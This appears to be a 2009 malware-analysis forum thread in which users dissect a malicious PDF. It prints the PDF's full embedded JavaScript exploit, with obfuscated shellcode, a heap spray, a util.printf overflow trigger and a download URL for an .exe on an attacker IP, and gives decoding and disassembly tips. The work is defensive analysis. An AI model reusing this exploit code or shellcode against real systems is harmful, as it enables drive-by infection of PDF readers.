Malicious PDF shellcode.....

[Chickensangwich]

Pulled down this malicious pdf. Looked like the payload url was staring right at me, but a little digging revealed that this was probably a red herring. I was able to get the shellcode, though there was some obfuscation I hadn't seen before. I was wondering what you guys could make of the shellcode. I've used all the tips I've gotten from bobby in other posts, but I just can't seem to get a payload URL out of this shellcode. Here's what I got (links neutered to protect the unwary):

GET /css/pdf.php?id=0&sid=87b184b480b785b684b588fb89ec81e087ba8fbe8bba8dbcb1 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, */*
Referer: http[:]//85.17.169.57/css/index.php?sid=87b184b480b785b684b588fb89ec81e087ba8fbe8bba8dbcb1
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)
Host: 85.17.169.57
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 23 Jan 2009 19:56:11 GMT
Content-Type: application/pdf
Connection: close
X-Powered-By: PHP/5.2.6
Accept-Ranges: bytes
Content-Length: 3160
Content-Disposition: inline; filename=1.pdf

Code: [Select]

Decompressed:

%PDF-1.3
%âãÏÓ
1 0 obj
<</OpenAction <</JS (this.pdl0sO9tpkuD\(\))
/S /JavaScript
>>
/Threads 2 0 R
/Outlines 3 0 R
/Pages 4 0 R
/ViewerPreferences <</PageDirection /L2R
>>
/PageLayout /SinglePage
/AcroForm 5 0 R
/Dests 6 0 R
/Names 7 0 R
/Type /Catalog
>>
endobj
2 0 obj
[]
endobj
3 0 obj
<</Count 0
/Type /Outlines
>>
endobj
4 0 obj
<</Resources 8 0 R
/Kids [9 0 R]
/Count 1
/Type /Pages
>>
endobj
5 0 obj
<</Fields []
>>
endobj
6 0 obj
<<>>
endobj
7 0 obj
<</JavaScript 10 0 R
>>
endobj
8 0 obj
<</ProcSet [/PDF /Text /ImageB /ImageC /ImageI]
>>
endobj
9 0 obj
<</Rotate 0
/Parent 4 0 R
/Resources 8 0 R
/TrimBox [0 0 595.28000 841.89000]
/MediaBox [0 0 595.28000 841.89000]
/pdftk_PageNum 1
/Contents 11 0 R
/Type /Page
>>
endobj
10 0 obj
<</Names [(New_Script) 12 0 R]
>>
endobj
11 0 obj
<</Length 30
>>
stream
0 0 595.28000 841.89000 re W n
endstream
endobj
12 0 obj
<</JS 13 0 R
/S /JavaScript
>>
endobj
13 0 obj
<</Length 2624
>>
stream
function pdl0sO9tpkuD() {
var url = "http://78.26.179.61/gDJozVF.exe?id=0&sid=87b184b480b785b684b588fb89ec81e087ba8fbe8bba8dbcb1&e=98";
var outValue = '';
   function abrvalg(arg) {
      var out = "";
      for (var i=0; i<arg.length;i=i+4) {
         var br1 = parseInt('0x'+arg[i] + arg[i+1], 16).toString(16);
         var br2 = parseInt('0x'+arg[i+2] + arg[i+3], 16).toString(16);
         if(br2.length == 1) { br2 = "0" + br2; };
         if(br1.length == 1) { br1 = "0" + br1; };
         out = out + "%u" + br1 + br2;
      }
      return out;
  }

for (i = 0; i < url.length; )
{
outValue += '%u' + ((i+1<url.length)?url.charCodeAt(i+1).toString(16):'00')+url.charCodeAt(i).toString(16);
i = i + 2;
}

Z7m5Z7r = unescape(""+abrvalg((
"9z09x09xx0900feb335rb66c98r0b98001ef33e243e"+
"bfaze805xffecfffrf8b7fdf4eefef64efe3af9f"+
"6442f39zf64x6ee7erf03ezfeb64efb9036187e1a"+
"10z703ef11efefaa66b9zeb7787651107e1ef1f"+
"efefaa66bz9e7ca871r05f072defz0defefaa66b"+
"9e391870dx37079cef3rbefefaa66zb9ff2e870a"+
"960757ef29ezfefaa66arxffbd76f9a2c6615f7a"+
"ae806efeeb1ezf9a6664crbebaaexe8564b6f7ba"+
("07b9ef64efef87zbff5d9r9fxcz07807efef66eff").replace(new RegExp(/[zxswqr]/g),"")+
"3aa2ax6z42f6c66bfcfaa10rz87efefbfefaa6485"+
"fbb6edxba6407zf7ef8eefefraaexc28cfb3efc19"+
"1288raexbaf8a97efef9a10z64rcfe3xaaee8564b6"+
"f7baarzfx07efef85efb7exz8aaecdccbbc3410bcc"+
"f9axbcrbfaa648z5f3b6eabxa6407f7zefccefefef"+
"859xa1zr064cfe7aaed8564b6zf7baff07efef85e"+
"f64exfffraaee856z4b6f7baef07efefaeefbdb4"+
"0eec0xeecr0eec0eecz036cb5eb64bcz0d35bd180"+
"f1064bxa64rz03e792b264b9e39c6464d3f19bec"+
"97b91c9x964rzeccfdc1ca62642ae2cecdcb9e01"+
"9ff511dd5e7xr9b212zeece2af1d1ez0411d49ab1"+
"b50a0464b564erccb8932e36464a4zf3b532ece"+
"b64xec64b12a2xrdb2zefe71b071011zba10a3bda0a2efa1"
).replace(new RegExp(/[zxswqr]/g),"")));

home = unescape(outValue);

runnable = Z7m5Z7r+home;
skipper = unescape(abrvalg(("0zx505"+"w0r5q0qq5").replace(new RegExp(/[zxswqr]/g),"")));

while (skipper.length<20+runnable.length)
{
skipper+=skipper;
}

skipper1 = skipper.substring(0, 20+runnable.length);
skipper2 = skipper.substring(0, skipper.length-20-runnable.length);

while(skipper2.length<(0x40000-20-runnable.length))
{
skipper2 += skipper2;
skipper2 += skipper1;//skipper2 = skipper2+skipper2+skipper1;
}

context = new Array();
ii=-1;

while(++ii<1414)
{
context[ii] = skipper2 + runnable;
}

var nm2 = 12;
for(i = 0; i < 18; i++){ nm2 = nm2 + "9"; }
for(i = 0; i < 276; i++){ nm2 = nm2 + "8"; }
var ft = unescape(("%25%r3r4z%zz35x%3z0zzq%3s0zr%30wqr%6s6wq").replace(new RegExp(/[zxswqr]/g),""));
var fck = util;
fck.printf(ft, nm2);
};
endstream
endobj
14 0 obj
<</Creator (Adobe InDesign CS3 \(5.0\))
/Producer (Adobe PDF Library 8.1)
/Trapped /False
/ModDate (D:20080901011952-04'03')
/CreationDate (D:20080803075149-09'03')
>>
endobj
xref
0 15
0000000000 65535 f
0000000015 00000 n
0000000264 00000 n
0000000282 00000 n
0000000327 00000 n
0000000400 00000 n
0000000431 00000 n
0000000451 00000 n
0000000490 00000 n
0000000556 00000 n
0000000734 00000 n
0000000784 00000 n
0000000864 00000 n
0000000911 00000 n
0000003587 00000 n
trailer
<</Info 14 0 R
/Root 1 0 R
/Size 15
>>
startxref
3771
%%EOF


partial decoding of shellcode (Let JavaScript do some work for me...):


var url = "http://78.26.179.61/gDJozVF.exe?id=0&sid=87b184b480b785b684b588fb89ec81e087ba8fbe8bba8dbcb1&e=98";
var outValue = '';
   function abrvalg(arg) {
      var out = "";
      for (var i=0; i<arg.length;i=i+4) {
         var br1 = parseInt('0x'+arg[i] + arg[i+1], 16).toString(16);
         var br2 = parseInt('0x'+arg[i+2] + arg[i+3], 16).toString(16);
         if(br2.length == 1) { br2 = "0" + br2; };
         if(br1.length == 1) { br1 = "0" + br1; };
         out = out + "%u" + br1 + br2;
      }
      return out;
  }

for (i = 0; i < url.length; )
{
outValue += '%u' + ((i+1<url.length)?url.charCodeAt(i+1).toString(16):'00')+url.charCodeAt(i).toString(16);
i = i + 2;
}

var Z7m5Z7r = (""+abrvalg((
"9z09x09xx0900feb335rb66c98r0b98001ef33e243e"+
"bfaze805xffecfffrf8b7fdf4eefef64efe3af9f"+
"6442f39zf64x6ee7erf03ezfeb64efb9036187e1a"+
"10z703ef11efefaa66b9zeb7787651107e1ef1f"+
"efefaa66bz9e7ca871r05f072defz0defefaa66b"+
"9e391870dx37079cef3rbefefaa66zb9ff2e870a"+
"960757ef29ezfefaa66arxffbd76f9a2c6615f7a"+
"ae806efeeb1ezf9a6664crbebaaexe8564b6f7ba"+
("07b9ef64efef87zbff5d9r9fxcz07807efef66eff").replace(new RegExp(/[zxswqr]/g),"")+
"3aa2ax6z42f6c66bfcfaa10rz87efefbfefaa6485"+
"fbb6edxba6407zf7ef8eefefraaexc28cfb3efc19"+
"1288raexbaf8a97efef9a10z64rcfe3xaaee8564b6"+
"f7baarzfx07efef85efb7exz8aaecdccbbc3410bcc"+
"f9axbcrbfaa648z5f3b6eabxa6407f7zefccefefef"+
"859xa1zr064cfe7aaed8564b6zf7baff07efef85e"+
"f64exfffraaee856z4b6f7baef07efefaeefbdb4"+
"0eec0xeecr0eec0eecz036cb5eb64bcz0d35bd180"+
"f1064bxa64rz03e792b264b9e39c6464d3f19bec"+
"97b91c9x964rzeccfdc1ca62642ae2cecdcb9e01"+
"9ff511dd5e7xr9b212zeece2af1d1ez0411d49ab1"+
"b50a0464b564erccb8932e36464a4zf3b532ece"+
"b64xec64b12a2xrdb2zefe71b071011zba10a3bda0a2efa1"
).replace(new RegExp(/[zxswqr]/g),"")));

eval(Z7m5Z7r);

shellcode? (malzilla output):

%u9090%u9090%u0feb%u335b%u66c9%u80b9%u8001%uef33%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03%uefeb%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66%ub9e7%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u9187%u0d37%u079c%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%uebaa%uee85%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%u66bf%ucfaa%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a%uebaf%u8a97%uefef%u9a10%u64cf%ue3aa%uee85%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8%uaaec%udccb%ubc34%u10bc%ucf9a%ubcbf%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc%uefef%uef85%u9a10%u64cf%ue7aa%ued85%u64b6%uf7ba%uff07%uefef%u85ef%u64ef%uffaa%uee85%u64b6%uf7ba%uef07%uefef%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10%u64ba%u6403%ue792%ub264%ub9e3%u9c64%u64d3%uf19b%uec97%ub91c%u9964%ueccf%udc1c%ua626%u42ae%u2cec%udcb9%ue019%uff51%u1dd5%ue79b%u212e%uece2%uaf1d%u1e04%u11d4%u9ab1%ub50a%u0464%ub564%ueccb%u8932%ue364%u64a4%uf3b5%u32ec%ueb64%uec64%ub12a%u2db2%uefe7%u1b07%u1011%uba10%ua3bd%ua0a2%uefa1

Just the shellcode:

Code: [Select]

%u9090%u9090%u0feb%u335b%u66c9%u80b9%u8001%uef33%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03%uefeb%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66%ub9e7%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u9187%u0d37%u079c%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%uebaa%uee85%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%u66bf%ucfaa%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a%uebaf%u8a97%uefef%u9a10%u64cf%ue3aa%uee85%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8%uaaec%udccb%ubc34%u10bc%ucf9a%ubcbf%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc%uefef%uef85%u9a10%u64cf%ue7aa%ued85%u64b6%uf7ba%uff07%uefef%u85ef%u64ef%uffaa%uee85%u64b6%uf7ba%uef07%uefef%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10%u64ba%u6403%ue792%ub264%ub9e3%u9c64%u64d3%uf19b%uec97%ub91c%u9964%ueccf%udc1c%ua626%u42ae%u2cec%udcb9%ue019%uff51%u1dd5%ue79b%u212e%uece2%uaf1d%u1e04%u11d4%u9ab1%ub50a%u0464%ub564%ueccb%u8932%ue364%u64a4%uf3b5%u32ec%ueb64%uec64%ub12a%u2db2%uefe7%u1b07%u1011%uba10%ua3bd%ua0a2%uefa1

Let me know if I screwed up getting to the shellcode, and if you can make anything of it. Any help is appreciated.

[Micha]

You already quoted the payload URL - it's not in the escaped shellcode but in the variable 'url'.

But your sid (=session ID) is no longer valid so you could not download the sample. Get a fresh sid first.

[Chickensangwich]

Yeah I thought this may be the case, but it looked like the variable 'url' was put in as a method of obfuscation. It looked like the 'url' variable was being used in the following functions to help obfuscate the shellcode (see below) Sorry if I'm not making too much sense. But that's what it looked like to me. I will try to do some run-time analysis and see what I get. Thanks for the idea on the session id. Still wondering how to disassemble the shellcode though.

Code: [Select]

for (i = 0; i < url.length; )
{
outValue += '%u' + ((i+1<url.length)?url.charCodeAt(i+1).toString(16):'00')+url.charCodeAt(i).toString(16);
i = i + 2;
}

[SysAdMini]

Still wondering how to disassemble the shellcode though.

Ok. quick and dirty:


Modify the script and put it into Malzilla's decoder tab

Code: [Select]

function pdl0sO9tpkuD() {
var url = "http://78.26.179.61/gDJozVF.exe?id=0&sid=87b184b480b785b684b588fb89ec81e087ba8fbe8bba8dbcb1&e=98";
var outValue = '';
   function abrvalg(arg) {
      var out = "";
      for (var i=0; i<arg.length;i=i+4) {
         var br1 = parseInt('0x'+arg[i] + arg[i+1], 16).toString(16);
         var br2 = parseInt('0x'+arg[i+2] + arg[i+3], 16).toString(16);
         if(br2.length == 1) { br2 = "0" + br2; };
         if(br1.length == 1) { br1 = "0" + br1; };
         out = out + "%u" + br1 + br2;
      }
      return out;
  }

for (i = 0; i < url.length; )
{
outValue += '%u' + ((i+1<url.length)?url.charCodeAt(i+1).toString(16):'00')+url.charCodeAt(i).toString(16);
i = i + 2;
}

Z7m5Z7r = unescape(""+abrvalg((
"9z09x09xx0900feb335rb66c98r0b98001ef33e243e"+
"bfaze805xffecfffrf8b7fdf4eefef64efe3af9f"+
"6442f39zf64x6ee7erf03ezfeb64efb9036187e1a"+
"10z703ef11efefaa66b9zeb7787651107e1ef1f"+
"efefaa66bz9e7ca871r05f072defz0defefaa66b"+
"9e391870dx37079cef3rbefefaa66zb9ff2e870a"+
"960757ef29ezfefaa66arxffbd76f9a2c6615f7a"+
"ae806efeeb1ezf9a6664crbebaaexe8564b6f7ba"+
("07b9ef64efef87zbff5d9r9fxcz07807efef66eff").replace(new RegExp(/[zxswqr]/g),"")+
"3aa2ax6z42f6c66bfcfaa10rz87efefbfefaa6485"+
"fbb6edxba6407zf7ef8eefefraaexc28cfb3efc19"+
"1288raexbaf8a97efef9a10z64rcfe3xaaee8564b6"+
"f7baarzfx07efef85efb7exz8aaecdccbbc3410bcc"+
"f9axbcrbfaa648z5f3b6eabxa6407f7zefccefefef"+
"859xa1zr064cfe7aaed8564b6zf7baff07efef85e"+
"f64exfffraaee856z4b6f7baef07efefaeefbdb4"+
"0eec0xeecr0eec0eecz036cb5eb64bcz0d35bd180"+
"f1064bxa64rz03e792b264b9e39c6464d3f19bec"+
"97b91c9x964rzeccfdc1ca62642ae2cecdcb9e01"+
"9ff511dd5e7xr9b212zeece2af1d1ez0411d49ab1"+
"b50a0464b564erccb8932e36464a4zf3b532ece"+
"b64xec64b12a2xrdb2zefe71b071011zba10a3bda0a2efa1"
).replace(new RegExp(/[zxswqr]/g),"")));

home = unescape(outValue);

document.write(escape(Z7m5Z7r+home));
}
pdl0sO9tpkuD();


Copy and paste the result (encoded shellcode) to "Misc Decoders" tab

Run "UCS2 To Hex" and "Hex To File"

Download IDA Pro Free

New/Various Files/Binary.

Done. Part of the shellcode is xored.

 

[Chickensangwich]

Thanks Sysadmini. Looks like I was halfway there. I had modified the script to get the shellcode earlier, didn't have the home variable added though. Messing with the new result now. Thanks for the tip, I'll let you know what I find.

[Chickensangwich]

You already quoted the payload URL - it's not in the escaped shellcode but in the variable 'url'.

Ok that was the case. The payload url was just being encoded and then appended to the rest of the shellcode as the 'home' variable. Wasn't looking at the javascript closely enough. Guess I was reading into it too much by thinking the 'url' variable was a misdirection. Lazy malware authors make life easier I guess. Thanks for all the help everyone.